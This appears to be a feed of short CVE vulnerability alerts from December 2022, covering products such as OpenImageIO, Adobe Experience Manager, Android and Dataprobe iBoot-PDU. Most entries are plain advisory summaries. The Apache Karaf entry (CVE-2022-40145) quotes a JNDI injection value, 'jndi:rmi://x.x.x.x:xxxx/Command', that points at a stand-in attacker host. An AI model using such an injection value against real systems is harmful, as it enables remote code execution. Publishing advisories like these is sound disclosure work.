🚨 CVE-2022-4687Incorrect Use of Privileged APIs in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-23 14:29:38 |
🚨 CVE-2022-4688Improper Authorization in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-23 14:29:37 |
🚨 CVE-2022-4689Improper Access Control in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-23 14:29:36 |
🚨 CVE-2022-4690Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-23 07:29:48 |
🚨 CVE-2022-32833An issue existed with the file paths used to store website data. The issue was resolved by improving how website data is stored. This issue is fixed in iOS 16. An unauthorized user may be able to access browsing history.🎖@cveNotify |
|
| 2022-12-23 07:29:46 |
🚨 CVE-2022-32945An access issue was addressed with additional sandbox restrictions on third-party apps. This issue is fixed in macOS Ventura 13. An app may be able to record audio with paired AirPods.🎖@cveNotify |
|
| 2022-12-23 07:29:45 |
🚨 CVE-2022-42818This issue was addressed with improved data protection. This issue is fixed in macOS Ventura 13. A user in a privileged network position may be able to track user activity.🎖@cveNotify |
|
| 2022-12-23 07:29:44 |
🚨 CVE-2022-46492nbnbk commit 879858451d53261d10f77d4709aee2d01c72c301 was discovered to contain an arbitrary file read vulnerability via the component /api/Index/getFileBinary.🎖@cveNotify |
|
| 2022-12-23 07:29:43 |
🚨 CVE-2022-4665Unrestricted Upload of File with Dangerous Type in GitHub repository ampache/ampache prior to 5.5.6.🎖@cveNotify |
|
| 2022-12-23 07:29:41 |
🚨 CVE-2021-32692Activity Watch is a free and open-source automated time tracker. Versions prior to 0.11.0 allow an attacker to execute arbitrary commands on any macOS machine with ActivityWatch running. The attacker can exploit this vulnerability by having the user visiting a website with the page title set to a malicious string. An attacker could use another application to accomplish the same, but the web browser is the most likely attack vector. This issue is patched in version 0.11.0. As a workaround, users can run the latest version of aw-watcher-window from source, or manually patch the `printAppTitle.scpt` file.🎖@cveNotify |
|
| 2022-12-23 07:29:40 |
🚨 CVE-2022-33324Improper Resource Shutdown or Release vulnerability in Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU Firmware versions "32" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions "65" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R08/16/32/120SFCPU all versions, Mitsubishi Electric Corporation MELSEC iQ-R Series R12CCPU-V all versions, Mitsubishi Electric Corporation MELSEC iQ-L Series L04/08/16/32HCPU all versions and Mitsubishi Electric Corporation MELIPC Series MI5122-VW all versions allows a remote unauthenticated attacker to cause a Denial of Service condition in Ethernet communication on the module by sending specially crafted packets. A system reset of the module is required for recovery.🎖@cveNotify |
|
| 2022-12-23 07:29:39 |
🚨 CVE-2022-46491A Cross-Site Request Forgery (CSRF) vulnerability in the Add Administrator function of the default version of nbnbk allows attackers to arbitrarily add Administrator accounts.🎖@cveNotify |
|
| 2022-12-23 07:29:38 |
🚨 CVE-2022-46493Default version of nbnbk was discovered to contain an arbitrary file upload vulnerability via the component /api/User/download_img.🎖@cveNotify |
|
| 2022-12-23 07:29:37 |
🚨 CVE-2022-47928In MISP before 2.4.167, there is XSS in the template file uploads in app/View/Templates/upload_file.ctp.🎖@cveNotify |
|
| 2022-12-23 02:29:52 |
🚨 CVE-2022-40897An issue discovered in Python Packaging Authority (PyPA) setuptools 65.3.0 and earlier allows remote attackers to cause a denial of service via crafted HTML package or custom PackageIndex page.🎖@cveNotify |
|
| 2022-12-23 02:29:51 |
🚨 CVE-2022-40899An issue discovered in Python Charmers Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server.🎖@cveNotify |
|
| 2022-12-23 02:29:47 |
🚨 CVE-2022-35262A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_xml_file/` API.🎖@cveNotify |
|
| 2022-12-23 02:29:46 |
🚨 CVE-2022-35264A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_aaa_cert_file/` API.🎖@cveNotify |
|
| 2022-12-23 02:29:45 |
🚨 CVE-2022-35270A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_wireguard_cert_file/` API.🎖@cveNotify |
|
| 2022-12-23 02:29:42 |
🚨 CVE-2022-35261A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_authorized_keys/` API.🎖@cveNotify |
|
| 2022-12-23 02:29:41 |
🚨 CVE-2022-35266A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_firmware/` API.🎖@cveNotify |
|
| 2022-12-23 02:29:40 |
🚨 CVE-2022-35268A denial of service vulnerability exists in the web_server hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability.This denial of service is in the `/action/import_sdk_file/` API.🎖@cveNotify |
|
| 2022-12-23 02:29:36 |
🚨 CVE-2022-46491A Cross-Site Request Forgery (CSRF) vulnerability in the Add Administrator function of the default version of nbnbk allows attackers to arbitrarily add Administrator accounts.🎖@cveNotify |
|
| 2022-12-23 02:29:35 |
🚨 CVE-2022-47928In MISP before 2.4.167, there is XSS in the template file uploads in app/View/Templates/upload_file.ctp.🎖@cveNotify |
|
| 2022-12-23 00:29:56 |
🚨 CVE-2022-22458IBM Security Verify Governance, Identity Manager 10.0.1 stores user credentials in plain clear text which can be read by a remote authenticated user. IBM X-Force ID: 225009.🎖@cveNotify |
|
| 2022-12-23 00:29:55 |
🚨 CVE-2022-41999A denial of service vulnerability exists in the DDS native tile reading functionality of OpenImageIO Project OpenImageIO v2.3.19.0 and v2.4.4.2. A specially-crafted .dds can lead to denial of service. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-23 00:29:54 |
🚨 CVE-2022-43592An information disclosure vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-23 00:29:52 |
🚨 CVE-2022-36354A heap out-of-bounds read vulnerability exists in the RLA format parser of OpenImageIO master-branch-9aeece7a and v2.3.19.0. More specifically, in the way run-length encoded byte spans are handled. A malformed RLA file can lead to an out-of-bounds read of heap metadata which can result in sensitive information leak. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-23 00:29:51 |
🚨 CVE-2022-43594Multiple denial of service vulnerabilities exist in the image output closing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially crafted ImageOutput Objects can lead to multiple null pointer dereferences. An attacker can provide malicious multiple inputs to trigger these vulnerabilities.This vulnerability applies to writing .bmp files.🎖@cveNotify |
|
| 2022-12-23 00:29:50 |
🚨 CVE-2022-38143A heap out-of-bounds write vulnerability exists in the way OpenImageIO v2.3.19.0 processes RLE encoded BMP images. A specially-crafted bmp file can write to arbitrary out of bounds memory, which can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-23 00:29:48 |
🚨 CVE-2022-41639A heap based buffer overflow vulnerability exists in tile decoding code of TIFF image parser in OpenImageIO master-branch-9aeece7a and v2.3.19.0. A specially-crafted TIFF file can lead to an out of bounds memory corruption, which can result in arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-23 00:29:46 |
🚨 CVE-2022-43596An information disclosure vulnerability exists in the IFFOutput channel interleaving functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-23 00:29:45 |
🚨 CVE-2022-41684A heap out of bounds read vulnerability exists in the OpenImageIO master-branch-9aeece7a when parsing the image file directory part of a PSD image file. A specially-crafted .psd file can cause a read of arbitrary memory address which can lead to denial of service. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-23 00:29:44 |
🚨 CVE-2022-43597Multiple memory corruption vulnerabilities exist in the IFFOutput alignment padding functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to arbitrary code execution. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `m_spec.format` is `TypeDesc::UINT8`.🎖@cveNotify |
|
| 2022-12-23 00:29:43 |
🚨 CVE-2022-43598Multiple memory corruption vulnerabilities exist in the IFFOutput alignment padding functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to arbitrary code execution. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `m_spec.format` is `TypeDesc::UINT16`.🎖@cveNotify |
|
| 2022-12-23 00:29:42 |
🚨 CVE-2022-43599Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `xmax` variable is set to 0xFFFF and `m_spec.format` is `TypeDesc::UINT8`🎖@cveNotify |
|
| 2022-12-23 00:29:41 |
🚨 CVE-2022-43600Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `xmax` variable is set to 0xFFFF and `m_spec.format` is `TypeDesc::UINT16`🎖@cveNotify |
|
| 2022-12-23 00:29:40 |
🚨 CVE-2022-43602Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises when the `ymax` variable is set to 0xFFFF and `m_spec.format` is `TypeDesc::UINT8`🎖@cveNotify |
|
| 2022-12-23 00:29:38 |
🚨 CVE-2022-43603A denial of service vulnerability exists in the ZfileOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to denial of service. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-23 00:29:37 |
🚨 CVE-2022-4662A flaw incorrect access control in the Linux kernel USB core subsystem was found in the way user attaches usb device. A local user could use this flaw to crash the system.🎖@cveNotify |
|
| 2022-12-23 00:29:36 |
🚨 CVE-2017-1000367Todd Miller's sudo version 1.8.20 and earlier is vulnerable to an input validation (embedded spaces) in the get_process_ttyname() function resulting in information disclosure and command execution.🎖@cveNotify |
|
| 2022-12-22 20:29:47 |
🚨 CVE-2022-38756A vulnerability has been identified in Micro Focus GroupWise Web in versions prior to 18.4.2. The GW Web component makes a request to the Post Office Agent that contains sensitive information in the query parameters that could be logged by any intervening HTTP proxies.🎖@cveNotify |
|
| 2022-12-22 20:29:43 |
🚨 CVE-2022-44510Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-22 20:29:42 |
🚨 CVE-2022-4601A vulnerability was found in Shoplazza LifeStyle 1.1. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/api/theme-edit/ of the component Shipping/Member Discount/Icon. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-216196.🎖@cveNotify |
|
| 2022-12-22 20:29:40 |
🚨 CVE-2022-4602A vulnerability was found in Shoplazza LifeStyle 1.1. It has been rated as problematic. This issue affects some unknown processing of the file /admin/api/theme-edit/ of the component Review Flow Handler. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-216197 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-22 20:29:37 |
🚨 CVE-2022-4599A vulnerability was found in Shoplazza LifeStyle 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/api/theme-edit/ of the component Product Handler. The manipulation of the argument Subheading/Heading/Text/Button Text/Label leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-216194 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-22 20:29:36 |
🚨 CVE-2022-4593A vulnerability was found in retra-system. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is a6d94ab88f4a6f631a14c59b72461140fb57ae1f. It is recommended to apply a patch to fix this issue. VDB-216186 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-22 20:29:35 |
🚨 CVE-2022-4592A vulnerability was found in luckyshot CRMx and classified as critical. This issue affects the function get/save/delete/comment/commentdelete of the file index.php. The manipulation leads to sql injection. The attack may be initiated remotely. The name of the patch is 8c62d274986137d6a1d06958a6f75c3553f45f8f. It is recommended to apply a patch to fix this issue. The identifier VDB-216185 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-22 15:29:47 |
🚨 CVE-2022-4581A vulnerability was found in 1j01 mind-map and classified as problematic. This issue affects some unknown processing of the file app.coffee. The manipulation of the argument html leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 9617e6084dfeccd92079ab4d7f439300a4b24394. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216167.🎖@cveNotify |
|
| 2022-12-22 15:29:43 |
🚨 CVE-2022-23530GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior to v0.1.8 are vulnerable to arbitrary file write when scanning a specially-crafted remote PyPI package. Extracting files using shutil.unpack_archive() from a potentially malicious tarball without validating that the destination file path is within the intended destination directory can cause files outside the destination directory to be overwritten. This issue is patched in version 0.1.8. Potential workarounds include using a safer module, like zipfile, and validating the location of the extracted files and discarding those with malicious paths.🎖@cveNotify |
|
| 2022-12-22 15:29:42 |
🚨 CVE-2022-47516An issue was discovered in the libsofia-sip fork in drachtio-server before 0.8.20. It allows remote attackers to cause a denial of service (daemon crash) via a crafted UDP message that leads to a failure of the libsofia-sip-ua/tport/tport.c self assertion.🎖@cveNotify |
|
| 2022-12-22 15:29:38 |
🚨 CVE-2022-23488BigBlueButton is an open source web conferencing system. Versions prior to 2.4-rc-6 are vulnerable to Insertion of Sensitive Information Into Sent Data. The moderators-only webcams lock setting is not enforced on the backend, which allows an attacker to subscribe to viewers' webcams, even when the lock setting is applied. (The required streamId was being sent to all users even with lock setting applied). This issue is fixed in version 2.4-rc-6. There are no workarounds.🎖@cveNotify |
|
| 2022-12-22 15:29:37 |
🚨 CVE-2022-4556A vulnerability was found in Alinto SOGo up to 5.7.1 and classified as problematic. Affected by this issue is the function _migrateMailIdentities of the file SoObjects/SOGo/SOGoUserDefaults.m of the component Identity Handler. The manipulation of the argument fullName leads to cross site scripting. The attack may be launched remotely. Upgrading to version 5.8.0 is able to address this issue. The name of the patch is efac49ae91a4a325df9931e78e543f707a0f8e5e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215960.🎖@cveNotify |
|
| 2022-12-22 15:29:36 |
🚨 CVE-2022-41992A memory corruption vulnerability exists in the VHD File Format parsing CXSPARSE record functionality of PowerISO PowerISO 8.3. A specially-crafted file can lead to an out-of-bounds write. A victim needs to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-22 13:29:37 |
🚨 CVE-2022-45347Apache ShardingSphere-Proxy prior to 5.3.0 when using MySQL as database backend didn't cleanup the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client. This vulnerability has been fixed in Apache ShardingSphere 5.3.0.🎖@cveNotify |
|
| 2022-12-22 13:29:36 |
🚨 CVE-2022-47896In JetBrains IntelliJ IDEA before 2022.3.1 code Templates were vulnerable to SSTI attacks.🎖@cveNotify |
|
| 2022-12-22 12:29:38 |
🚨 CVE-2020-36624A vulnerability was found in ahorner text-helpers 1.1.0/1.1.1. It has been declared as critical. This vulnerability affects unknown code of the file lib/text_helpers/translation.rb. The manipulation of the argument link leads to use of web link to untrusted target with window.opener access. The attack can be initiated remotely. Upgrading to version 1.2.0 is able to address this issue. The name of the patch is 184b60ded0e43c985788582aca2d1e746f9405a3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216520.🎖@cveNotify |
|
| 2022-12-22 12:29:37 |
🚨 CVE-2022-41654An authentication bypass vulnerability exists in the newsletter subscription functionality of Ghost Foundation Ghost 5.9.4. A specially-crafted HTTP request can lead to increased privileges. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-22 12:29:36 |
🚨 CVE-2022-41697A user enumeration vulnerability exists in the login functionality of Ghost Foundation Ghost 5.9.4. A specially-crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send a series of HTTP requests to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-22 07:29:42 |
🚨 CVE-2022-25948The package liquidjs before 10.0.0 are vulnerable to Information Exposure when ownPropertyOnly parameter is set to False, which results in leaking properties of a prototype. WorkaroundFor versions 9.34.0 and higher, an option to disable this functionality is provided.🎖@cveNotify |
|
| 2022-12-22 07:29:41 |
🚨 CVE-2022-4644Open Redirect in GitHub repository ikus060/rdiffweb prior to 2.5.4.🎖@cveNotify |
|
| 2022-12-22 07:29:37 |
🚨 CVE-2021-43657A Stored Cross-site scripting (XSS) vulnerability via MAster.php in Sourcecodetester Simple Client Management System (SCMS) 1.0 allows remote attackers to inject arbitrary web script or HTML via the vulnerable input fields.🎖@cveNotify |
|
| 2022-12-22 07:29:36 |
🚨 CVE-2022-4647Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.3.2.🎖@cveNotify |
|
| 2022-12-22 02:29:44 |
🚨 CVE-2022-3184Dataprobe iBoot-PDU FW versions prior to 1.42.06162022 contain a vulnerability where the device’s existing firmware allows unauthenticated users to access an old PHP page vulnerable to directory traversal, which may allow a user to write a file to the webroot directory.🎖@cveNotify |
|
| 2022-12-22 02:29:40 |
🚨 CVE-2022-3185Dataprobe iBoot-PDU FW versions prior to 1.42.06162022 contain a vulnerability where the affected product exposes sensitive data concerning the device.🎖@cveNotify |
|
| 2022-12-22 02:29:39 |
🚨 CVE-2022-3186Dataprobe iBoot-PDU FW versions prior to 1.42.06162022 contain a vulnerability where the affected product allows an attacker to access the device’s main management page from the cloud. This feature enables users to remotely connect devices, however, the current implementation permits users to access other device's information.🎖@cveNotify |
|
| 2022-12-22 02:29:38 |
🚨 CVE-2022-3187Dataprobe iBoot-PDU FW versions prior to 1.42.06162022 contain a vulnerability where certain PHP pages only validate when a valid connection is established with the database. However, these PHP pages do not verify the validity of a user. Attackers could leverage this lack of verification to read the state of outlets.🎖@cveNotify |
|
| 2022-12-22 02:29:37 |
🚨 CVE-2022-3188Dataprobe iBoot-PDU FW versions prior to 1.42.06162022 contain a vulnerability where unauthenticated users could open PHP index pages without authentication and download the history file from the device; the history file includes the latest actions completed by specific users.🎖@cveNotify |
|
| 2022-12-22 02:29:36 |
🚨 CVE-2022-3189Dataprobe iBoot-PDU FW versions prior to 1.42.06162022 contain a vulnerability where a specially crafted PHP script could use parameters from a HTTP request to create a URL capable of changing the host parameter. The changed host parameter in the HTTP could point to another host that will send a request to the host or IP specified in the changed host parameter.🎖@cveNotify |
|
| 2022-12-22 00:29:37 |
🚨 CVE-2022-46334Proofpoint Enterprise Protection (PPS/PoD) contains a vulnerability which allows the pps user to escalate to root privileges due to unnecessary permissions. This affects all versions 8.19.0 and below.🎖@cveNotify |
|
| 2022-12-21 22:29:55 |
🚨 CVE-2022-42534In trusty_ffa_mem_reclaim of shared-mem-smcall.c, there is a possible privilege escalation due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-237838301References: N/A🎖@cveNotify |
|
| 2022-12-21 22:29:54 |
🚨 CVE-2022-42530In Pixel firmware, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-242331893References: N/A🎖@cveNotify |
|
| 2022-12-21 22:29:53 |
🚨 CVE-2022-42544In getView of AddAppNetworksFragment.java, there is a possible way to mislead the user about network add requests due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-224545390🎖@cveNotify |
|
| 2022-12-21 22:29:49 |
🚨 CVE-2022-42542In phNxpNciHal_core_initialized of phNxpNciHal.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-231445184🎖@cveNotify |
|
| 2022-12-21 22:29:48 |
🚨 CVE-2022-42543In fdt_path_offset_namelen of fdt_ro.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-249998113References: N/A🎖@cveNotify |
|
| 2022-12-21 22:29:47 |
🚨 CVE-2020-36622A vulnerability was found in sah-comp bienlein and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The name of the patch is d7836a4f2b241e4745ede194f0f6fb47199cab6b. It is recommended to apply a patch to fix this issue. The identifier VDB-216473 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-21 22:29:43 |
🚨 CVE-2020-36623A vulnerability was found in Pengu. It has been declared as problematic. Affected by this vulnerability is the function runApp of the file src/index.js. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The name of the patch is aea66f12b8cdfc3c8c50ad6a9c89d8307e9d0a91. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216475.🎖@cveNotify |
|
| 2022-12-21 22:29:42 |
🚨 CVE-2021-4264A vulnerability was found in LinkedIn dustjs 3.0.0 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.0.1 is able to address this issue. The name of the patch is ddb6523832465d38c9d80189e9de60519ac307c3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216464.🎖@cveNotify |
|
| 2022-12-21 22:29:41 |
🚨 CVE-2021-4265A vulnerability was found in siwapp-ror. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 924d16008cfcc09356c87db01848e45290cb58ca. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216467.🎖@cveNotify |
|
| 2022-12-21 22:29:37 |
🚨 CVE-2021-4267A vulnerability classified as problematic was found in tad_discuss. Affected by this vulnerability is an unknown functionality. The manipulation of the argument DiscussTitle leads to cross site scripting. The attack can be launched remotely. The name of the patch is af94d034ff8db642d05fd8788179eab05f433958. It is recommended to apply a patch to fix this issue. The identifier VDB-216469 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-21 22:29:36 |
🚨 CVE-2021-4270A vulnerability was found in Imprint CMS. It has been classified as problematic. Affected is the function SearchForm of the file ImprintCMS/Models/ViewHelpers.cs. The manipulation of the argument query leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 6140b140ccd02b5e4e7d6ba013ac1225724487f4. It is recommended to apply a patch to fix this issue. VDB-216474 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-21 20:30:05 |
🚨 CVE-2022-40841A cross-site scripting (XSS) vulnerability in NdkAdvancedCustomizationFields v3.5.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payloads injected into the "htmlNodes" parameter.🎖@cveNotify |
|
| 2022-12-21 20:30:03 |
🚨 CVE-2022-4630Sensitive Cookie Without 'HttpOnly' Flag in GitHub repository lirantal/daloradius prior to master.🎖@cveNotify |
|
| 2022-12-21 20:30:02 |
🚨 CVE-2022-42504In CallDialReqData::encodeCallNumber of callreqdata.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-241232209References: N/A🎖@cveNotify |
|
| 2022-12-21 20:30:01 |
🚨 CVE-2022-42366Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-21 20:29:59 |
🚨 CVE-2022-42505In ProtocolMiscBuilder::BuildSetSignalReportCriteria of protocolmiscbuilder.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-241232492References: N/A🎖@cveNotify |
|
| 2022-12-21 20:29:58 |
🚨 CVE-2022-42360Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2022-12-21 20:29:56 |
🚨 CVE-2022-38655BigFix WebUI non-master operators are missing controls that prevent them from being able to modify the relevance of fixlets or to deploy fixlets from the BES Support external site.🎖@cveNotify |
|
| 2022-12-21 20:29:54 |
🚨 CVE-2022-42454Insights for Vulnerability Remediation (IVR) is vulnerable to man-in-the-middle attacks that may lead to information disclosure. This requires privileged network access.🎖@cveNotify |
|
| 2022-12-21 20:29:52 |
🚨 CVE-2022-44756Insights for Vulnerability Remediation (IVR) is vulnerable to improper input validation. This may lead to information disclosure. This requires privileged access.🎖@cveNotify |
|
| 2022-12-21 20:29:51 |
🚨 CVE-2022-47581Isode M-Vault 16.0v0 through 17.x before 17.0v24 can crash upon an LDAP v1 bind request.🎖@cveNotify |
|
| 2022-12-21 20:29:49 |
🚨 CVE-2022-4287Authentication bypass in local application lock feature in Devolutions Remote Desktop Manager 2022.3.26 and earlier on Windows allows malicious user to access the application.🎖@cveNotify |
|
| 2022-12-21 20:29:48 |
🚨 CVE-2022-40145This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8🎖@cveNotify |
|
| 2022-12-21 20:29:46 |
🚨 CVE-2022-42351Adobe Experience Manager version 6.5.14 (and earlier) is affected by an Incorrect Authorization vulnerability that could result in a security feature bypass. A low-privileged attacker could leverage this vulnerability to disclose low level confidentiality information. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2022-12-21 20:29:45 |
🚨 CVE-2022-41208Due to insufficient input validation, SAP Financial Consolidation - version 1010, allows an authenticated attacker with user privileges to alter current user session. On successful exploitation, the attacker can view or modify information, causing a limited impact on confidentiality and integrity of the application.🎖@cveNotify |
|
| 2022-12-21 20:29:44 |
🚨 CVE-2022-41258Due to insufficient input validation, SAP Financial Consolidation - version 1010, allows an authenticated attacker to inject malicious script when running a common query in the Web Administration Console. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality, integrity and availability of the application.🎖@cveNotify |
|
| 2022-12-21 20:29:43 |
🚨 CVE-2022-42343Adobe Campaign version 7.3.1 (and earlier) and 8.3.9 (and earlier) are affected by a Server-Side Request Forgery (SSRF) vulnerability that could lead to arbitrary file system read. A low-privilege authenticated attacker can force the application to make arbitrary requests via injection of arbitrary URLs. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2022-12-21 20:29:41 |
🚨 CVE-2022-44502Adobe Illustrator versions 26.5.1 (and earlier), and 27.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2022-12-21 20:29:40 |
🚨 CVE-2022-44498Adobe Illustrator versions 26.5.1 (and earlier), and 27.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2022-12-21 20:29:39 |
